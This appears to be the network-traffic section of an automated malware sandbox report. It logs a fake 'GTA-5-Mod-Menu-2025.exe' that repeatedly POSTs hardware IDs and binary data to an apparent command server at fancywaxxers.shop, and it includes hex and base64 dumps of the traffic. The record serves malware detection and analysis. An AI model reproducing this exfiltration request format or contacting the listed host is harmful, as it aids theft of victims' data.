                                                                  Data Ascii: /MyCz7cLlBuVMNWxI7x+BlDVQI9UICqrTAm1y3d+nqz7xs2X9FCuHI4uz7M9sDkRF8sPj1BmfegES/vJbDHB7dvEwZTjVbdYm2/Z/DS2fkFeyg6JVWBg408Ovtx/eJSg+9nImPRYoRKOLsq4Prc4GR6MTshfeDKzBCa+3nN9j+/BlN3Z7hihFMR5gLQ2uT0SEc8Ig0pgYO1JAKnIcX+TrunezJH0Ua0RgSbE/H36OQFelECpVWt+4VMF+9E6aNm
                                                                  2024-12-30 19:41:00 UTC1369INData Raw: 34 35 32 65 0d 0a 6c 6b 52 4a 71 6a 39 64 50 55 31 2b 67 57 76 31 69 44 4c 59 44 6b 63 37 55 78 46 68 62 4d 41 59 78 56 5a 48 50 6d 53 41 79 34 77 6e 68 35 6c 4b 48 2f 32 38 71 66 39 46 43 30 46 6f 6f 6e 78 72 77 32 2b 6e 42 5a 47 64 52 41 30 42 68 45 66 50 78 51 44 76 6e 37 64 33 2b 58 71 75 32 55 33 64 6e 75 47 4b 45 55 78 48 6d 41 73 6a 36 78 4d 68 34 58 7a 51 4f 49 55 6d 35 39 34 55 77 4e 75 38 4e 31 65 70 47 72 39 74 2f 4e 6d 50 42 51 70 52 53 42 4c 4d 50 38 66 66 6f 35 41 56 36 55 51 4b 31 57 59 32 50 36 42 6a 43 34 77 48 70 32 6a 2b 33 6b 6d 74 76 58 38 46 54 6d 51 4d 51 72 78 37 73 33 74 7a 51 61 47 73 67 4e 68 31 46 70 65 2f 6c 4f 43 62 58 63 65 58 75 63 6f 2f 66 52 7a 5a 66 32 57 61 67 53 6a 32 47 4f 2f 44 53 69 66 6b 46 65 34 77 32 59 53 6d 70
                                                                  Data Ascii: 452elkRJqj9dPU1+gWv1iDLYDkc7UxFhbMAYxVZHPmSAy4wnh5lKH/28qf9FC0Foonxrw2+nBZGdRA0BhEfPxQDvn7d3+Xqu2U3dnuGKEUxHmAsj6xMh4XzQOIUm594UwNu8N1epGr9t/NmPBQpRSBLMP8ffo5AV6UQK1WY2P6BjC4wHp2j+3kmtvX8FTmQMQrx7s3tzQaGsgNh1Fpe/lOCbXceXuco/fRzZf2WagSj2GO/DSifkFe4w2YSmp
                                                                  2024-12-30 19:41:00 UTC1369INData Raw: 2f 76 4a 62 44 48 42 37 64 54 58 31 4a 32 33 52 2b 67 42 78 43 62 4d 2f 47 76 36 4e 42 55 61 7a 77 79 42 56 47 31 7a 37 30 4d 49 76 38 35 79 64 35 79 73 38 4e 7a 4f 6d 50 31 55 6f 68 53 4e 4a 38 79 2f 4d 4c 78 2b 56 31 37 4c 47 4d 67 41 49 46 50 6d 54 77 6d 37 7a 57 56 32 32 65 4f 37 32 73 53 58 74 77 43 77 43 4a 4d 6d 33 2f 49 71 2b 6a 6b 56 58 70 52 41 67 6b 70 6c 66 4f 39 4f 41 4c 2f 43 66 6e 47 63 76 2f 50 53 78 5a 76 2f 58 61 6b 65 67 53 7a 48 74 7a 43 6f 4c 42 6f 61 77 67 7a 49 46 69 42 31 38 77 52 64 2b 2b 74 6a 63 6f 6d 72 2b 4a 54 64 32 65 34 59 6f 52 54 45 65 59 43 38 50 62 59 31 48 68 58 48 42 49 78 59 62 58 6e 6c 53 67 79 33 78 6e 68 32 69 36 44 2b 33 4d 69 65 38 6c 53 72 47 35 59 69 77 66 78 39 2b 6a 6b 42 58 70 52 41 72 32 74 58 55 61 74 62
                                                                  Data Ascii: /vJbDHB7dTX1J23R+gBxCbM/Gv6NBUazwyBVG1z70MIv85yd5ys8NzOmP1UohSNJ8y/MLx+V17LGMgAIFPmTwm7zWV22eO72sSXtwCwCJMm3/Iq+jkVXpRAgkplfO9OAL/CfnGcv/PSxZv/XakegSzHtzCoLBoawgzIFiB18wRd++tjcomr+JTd2e4YoRTEeYC8PbY1HhXHBIxYbXnlSgy3xnh2i6D+3Mie8lSrG5Yiwfx9+jkBXpRAr2tXUatb
                                                                  2024-12-30 19:41:00 UTC1369INData Raw: 4e 70 32 66 57 37 2b 4d 47 59 2f 42 69 35 56 70 31 68 78 37 42 7a 34 6e 34 65 46 73 51 4f 69 31 35 72 66 75 64 46 44 4c 33 4c 66 48 61 57 71 76 4c 54 77 70 48 6c 58 36 73 52 68 43 72 4a 74 6a 65 37 4e 56 6c 51 6a 41 65 51 47 44 67 79 32 55 4d 54 71 38 30 30 62 74 65 30 75 39 50 4f 31 36 38 59 71 77 71 46 4a 4e 4b 34 50 4c 45 73 45 68 6a 4d 42 5a 70 66 62 48 6a 6b 52 77 32 32 7a 58 78 6a 6d 61 44 37 78 74 43 52 2f 46 62 6d 56 73 51 6d 32 50 78 72 2b 67 38 4f 46 59 77 66 78 6b 45 67 64 65 63 45 58 66 76 4e 66 6e 79 58 76 2f 2f 53 79 5a 54 35 55 4b 4d 51 67 43 76 4e 73 7a 69 77 4e 78 45 65 77 77 57 41 55 32 5a 38 36 6b 49 4a 74 6f 34 36 4d 5a 36 31 75 34 79 43 73 4f 31 56 6f 41 2b 56 46 4d 65 38 59 76 6f 68 56 77 65 4d 42 34 51 59 4f 44 4c 6d 53 41 2b 32 79
                                                                  Data Ascii: Np2fW7+MGY/Bi5Vp1hx7Bz4n4eFsQOi15rfudFDL3LfHaWqvLTwpHlX6sRhCrJtje7NVlQjAeQGDgy2UMTq800bte0u9PO168YqwqFJNK4PLEsEhjMBZpfbHjkRw22zXxjmaD7xtCR/FbmVsQm2Pxr+g8OFYwfxkEgdecEXfvNfnyXv//SyZT5UKMQgCvNsziwNxEewwWAU2Z86kIJto46MZ61u4yCsO1VoA+VFMe8YvohVweMB4QYODLmSA+2y
                                                                  2024-12-30 19:41:00 UTC1369INData Raw: 74 35 4a 72 62 31 2f 42 55 35 6b 44 45 4c 38 32 36 4d 72 73 32 45 52 37 4b 43 6f 78 62 61 58 48 73 54 51 4f 77 7a 58 35 2b 6e 71 76 2f 31 4d 6d 51 2b 56 36 6a 45 34 31 68 6a 76 77 30 6f 6e 35 42 58 75 6f 6a 6d 6b 70 53 66 4f 68 66 52 61 53 41 62 54 47 65 6f 62 75 4d 67 70 7a 2f 56 37 51 64 6a 53 6e 45 74 54 4f 2b 4e 42 51 5a 7a 41 57 46 58 57 52 38 37 30 4d 46 74 38 46 7a 65 5a 61 70 2b 39 75 43 32 62 64 66 76 6c 6a 63 59 65 43 33 4a 5a 73 77 45 67 79 4d 48 38 5a 42 49 48 58 6e 42 46 33 37 77 48 31 77 6b 61 50 33 33 4d 61 46 39 31 4f 76 46 34 55 75 77 4c 38 79 73 44 59 4c 47 4d 77 4c 67 46 39 6f 64 75 56 57 42 4c 53 4f 4f 6a 47 65 74 62 75 4d 67 71 62 68 58 36 45 58 78 67 6a 48 70 7a 4b 77 50 52 49 53 6a 42 2f 47 51 53 42 31 35 77 52 64 2b 38 4e 34 66 4a
                                                                  Data Ascii: t5Jrb1/BU5kDEL826Mrs2ER7KCoxbaXHsTQOwzX5+nqv/1MmQ+V6jE41hjvw0on5BXuojmkpSfOhfRaSAbTGeobuMgpz/V7QdjSnEtTO+NBQZzAWFXWR870MFt8FzeZap+9uC2bdfvljcYeC3JZswEgyMH8ZBIHXnBF37wH1wkaP33MaF91OvF4UuwL8ysDYLGMwLgF9oduVWBLSOOjGetbuMgqbhX6EXxgjHpzKwPRISjB/GQSB15wRd+8N4fJ
                                                                  2024-12-30 19:41:00 UTC1369INData Raw: 78 5a 75 33 41 4f 59 54 69 69 54 42 73 44 6d 39 4d 41 73 66 78 67 79 4a 58 32 64 35 2b 55 38 58 73 4d 5a 33 66 35 47 6b 2b 39 72 43 6c 76 70 59 35 6c 62 45 4a 74 6a 38 61 2f 6f 62 4f 67 6e 61 43 73 70 37 64 32 54 68 51 77 6d 74 78 58 56 79 6a 36 44 72 6c 49 7a 58 35 6c 2b 33 57 4e 77 33 30 4b 73 30 70 58 41 41 58 73 73 4d 79 41 41 67 65 65 52 4b 43 4c 44 4b 66 58 53 52 72 76 37 52 79 4a 76 37 57 61 34 52 6a 69 54 46 75 6a 6d 35 4d 42 59 66 77 41 53 42 56 6d 6b 79 70 51 51 43 6f 34 34 73 4d 61 2b 39 2f 4d 7a 50 68 37 56 71 70 51 6d 56 4e 4d 32 73 4e 66 67 52 47 68 4c 50 42 59 39 49 49 47 32 6c 58 55 57 38 77 6a 51 70 32 61 33 2f 32 4d 47 51 2b 56 65 72 46 34 4d 71 7a 37 59 39 71 44 45 63 46 73 41 49 68 55 70 71 65 50 6c 4e 44 4c 62 41 66 47 4f 61 37 62 57
                                                                  Data Ascii: xZu3AOYTiiTBsDm9MAsfxgyJX2d5+U8XsMZ3f5Gk+9rClvpY5lbEJtj8a/obOgnaCsp7d2ThQwmtxXVyj6DrlIzX5l+3WNw30Ks0pXAAXssMyAAgeeRKCLDKfXSRrv7RyJv7Wa4RjiTFujm5MBYfwASBVmkypQQCo44sMa+9/MzPh7VqpQmVNM2sNfgRGhLPBY9IIG2lXUW8wjQp2a3/2MGQ+VerF4Mqz7Y9qDEcFsAIhUpqePlNDLbAfGOa7bW
                                                                  2024-12-30 19:41:00 UTC1369INData Raw: 42 6a 2b 49 63 52 70 67 49 4e 39 2b 69 5a 5a 52 6f 77 31 69 31 5a 75 64 66 31 56 53 4a 72 44 66 33 32 55 6f 76 43 55 6a 4e 66 78 47 50 35 49 79 6d 48 45 72 58 50 69 62 6b 74 46 6d 56 50 66 43 44 4a 74 70 56 31 46 72 59 34 73 49 39 66 74 36 5a 53 61 31 37 42 62 74 41 71 43 49 74 61 2f 64 49 51 41 4f 67 6e 61 43 70 4d 61 52 6e 58 36 54 52 4f 32 33 45 70 50 74 36 44 36 31 38 7a 56 78 6b 36 72 43 49 63 6b 78 34 49 4e 74 44 6b 4e 47 63 49 47 69 42 67 75 4d 75 51 45 58 59 4b 4f 50 44 47 6d 34 37 76 4d 67 73 2b 33 62 61 55 57 69 69 62 57 72 58 36 5a 4b 51 38 55 31 30 4b 75 58 33 46 37 2f 55 6b 58 2b 34 41 30 64 39 6e 31 71 35 71 43 6b 2b 59 59 2f 6b 6a 57 65 70 58 76 5a 4f 70 73 42 6c 44 56 51 4a 34 59 4f 43 43 6c 42 42 66 37 6c 6a 51 32 6d 72 2f 70 30 73 47 42
                                                                  Data Ascii: Bj+IcRpgIN9+iZZRow1i1Zudf1VSJrDf32UovCUjNfxGP5IymHErXPibktFmVPfCDJtpV1FrY4sI9ft6ZSa17BbtAqCIta/dIQAOgnaCpMaRnX6TRO23EpPt6D618zVxk6rCIckx4INtDkNGcIGiBguMuQEXYKOPDGm47vMgs+3baUWiibWrX6ZKQ8U10KuX3F7/UkX+4A0d9n1q5qCk+YY/kjWepXvZOpsBlDVQJ4YOCClBBf7ljQ2mr/p0sGB
                                                                  2024-12-30 19:41:00 UTC1369INData Raw: 62 45 4a 64 48 38 61 2b 70 73 51 6b 75 66 56 39 67 4b 66 7a 7a 79 42 42 50 37 6c 69 59 2f 32 62 2b 37 6a 49 4c 51 39 45 71 30 48 6f 63 33 77 2f 73 4e 68 41 73 61 45 4d 49 48 6e 6d 31 6a 59 2b 68 45 44 6f 58 77 56 58 2b 53 71 76 66 43 2f 4b 6e 43 57 36 67 57 67 7a 66 52 2f 48 33 36 4d 56 6c 47 39 55 44 41 47 46 38 38 71 31 78 46 34 34 35 42 63 70 65 6a 2f 4d 4c 54 32 73 4a 62 74 78 75 45 4b 6f 44 79 63 37 78 2b 51 55 79 43 51 49 78 4a 49 43 71 37 46 6c 37 75 6e 53 4d 68 79 37 4b 31 7a 59 4b 42 74 77 44 30 56 73 51 7a 67 4f 52 7a 2f 54 30 4c 44 4d 6f 44 6e 6c 73 6e 54 4e 56 69 42 72 7a 49 64 33 2b 4f 76 4c 6e 37 77 5a 7a 37 56 4b 45 4f 75 68 2f 56 76 7a 32 30 4f 51 38 50 6a 45 37 49 56 79 41 71 30 67 51 55 73 63 6b 34 4f 64 57 38 36 4e 72 4a 67 66 41 59 6d
                                                                  Data Ascii: bEJdH8a+psQkufV9gKfzzyBBP7liY/2b+7jILQ9Eq0Hoc3w/sNhAsaEMIHnm1jY+hEDoXwVX+SqvfC/KnCW6gWgzfR/H36MVlG9UDAGF88q1xF445Bcpej/MLT2sJbtxuEKoDyc7x+QUyCQIxJICq7Fl7unSMhy7K1zYKBtwD0VsQzgORz/T0LDMoDnlsnTNViBrzId3+OvLn7wZz7VKEOuh/Vvz20OQ8PjE7IVyAq0gQUsck4OdW86NrJgfAYm


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.649707104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:41:01 UTC276OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=2PP8C865FU3
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 12821
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:41:01 UTC12821OUTData Raw: 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 32 50 50 38 43 38 36 35 46 55 33 0d 0a
                                                                  Data Ascii: --2PP8C865FU3Content-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--2PP8C865FU3Content-Disposition: form-data; name="pid"2--2PP8C865FU3Content-Disposition: form-data; name="lid"yau6Na--899083440--2PP8C865FU3
                                                                  2024-12-30 19:41:01 UTC1142INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:41:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=eehpgke3jctt3t66orrvd01c83; expires=Fri, 25 Apr 2025 13:27:40 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCasH6jHoDqy%2B9YxTxp8OJJojLoBirzhPCZgcTs1CYM8nh5cu%2BdFgFz1EdPPqHhg%2BfaIv9rvT%2F%2FYgD0wEmi%2FohspnRoL7esrxz0iHn1qiYdi8jQAx4rH37Su%2FuD7GrWm8MoqtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa481426a9e42c0-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1730&rtt_var=865&sent=11&recv=19&lost=0&retrans=1&sent_bytes=4224&recv_bytes=13755&delivery_rate=330242&cwnd=212&unsent_bytes=0&cid=e43fd4ec5d0901c1&ts=715&x=0"
                                                                  2024-12-30 19:41:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-30 19:41:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.649708104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:41:02 UTC273OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=E4S8N39O
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 15049
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:41:02 UTC15049OUTData Raw: 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 45 34 53 38 4e 33 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                  Data Ascii: --E4S8N39OContent-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--E4S8N39OContent-Disposition: form-data; name="pid"2--E4S8N39OContent-Disposition: form-data; name="lid"yau6Na--899083440--E4S8N39OContent-Disp
                                                                  2024-12-30 19:41:02 UTC1138INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:41:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=ubkahbh8j9apvrciih75r4u6ad; expires=Fri, 25 Apr 2025 13:27:41 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkvYNBqBqmns%2BOKbeZtGWE6SYklMGdRjFq22%2Bc4dS1AD1GBywxv2zBSrD9%2Fqd7r%2F8OE1WHinud8WTcO2dojWu%2BlRPZgvE4YhBho1klzXb3MVF%2FvWfyMIYOpqSmRlinYIdMWoHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa48149eb49c32e-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1634&rtt_var=651&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15980&delivery_rate=1631284&cwnd=178&unsent_bytes=0&cid=4129f500dc5e66e3&ts=497&x=0"
                                                                  2024-12-30 19:41:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-30 19:41:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.649709104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:41:03 UTC273OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=WAQFEYZ2
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 19907
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:41:03 UTC15331OUTData Raw: 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 57 41 51 46 45 59 5a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                  Data Ascii: --WAQFEYZ2Content-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--WAQFEYZ2Content-Disposition: form-data; name="pid"3--WAQFEYZ2Content-Disposition: form-data; name="lid"yau6Na--899083440--WAQFEYZ2Content-Disp
                                                                  2024-12-30 19:41:03 UTC4576OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6 3d
                                                                  Data Ascii: 2+?2+?o?Mp5p_oI=
                                                                  2024-12-30 19:41:04 UTC1135INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:41:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=vpt24bg3nt64f4q417a34548lq; expires=Fri, 25 Apr 2025 13:27:42 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jkf4Z9sfDrZ0tR0qCgdLphoofwfa5UlWEzVP9d9X%2FtXPLcn74oSuvGf9l8azL1JLYNSGdf%2Bq3DoZ%2B8JhX854dLuLmJqrjujqx6W5shQe8ivz1BveMZIwSseHPQBR6hIoVXRq%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa48151ae1572a4-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1980&rtt_var=748&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=20860&delivery_rate=1474747&cwnd=212&unsent_bytes=0&cid=182ca9532f0eb68f&ts=726&x=0"
                                                                  2024-12-30 19:41:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                  Data Ascii: fok 8.46.123.189
                                                                  2024-12-30 19:41:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.649710104.21.96.14436216C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 19:41:05 UTC276OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: multipart/form-data; boundary=L7D6IRQA4TEV
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 1220
                                                                  Host: fancywaxxers.shop
                                                                  2024-12-30 19:41:05 UTC1220OUTData Raw: 2d 2d 4c 37 44 36 49 52 51 41 34 54 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 4c 37 44 36 49 52 51 41 34 54 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 37 44 36 49 52 51 41 34 54 45 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 4c 37 44 36 49 52 51 41 34 54
                                                                  Data Ascii: --L7D6IRQA4TEVContent-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--L7D6IRQA4TEVContent-Disposition: form-data; name="pid"1--L7D6IRQA4TEVContent-Disposition: form-data; name="lid"yau6Na--899083440--L7D6IRQA4T
                                                                  2024-12-30 19:41:07 UTC1129INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 19:41:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=rb4m0rt4s403nkdsr3di9nv9ar; expires=Fri, 25 Apr 2025 13:27:44 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzmb7v9DxjkeLxQ5hSwD2wtCyUYow9LuDAGq7ExmWcGczFusX5Cr7H4d1uTsP1eGslvjFZ9bz3%2Fw6Lu7xv50NmJyuQ4F5HGPh9aVfubNt6w0uDRVnhwJt%2BxX968UZLK0LGe72A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa4815b7d864363-EWR
                                                                  alt-svc: h3=":443"; ma=86400
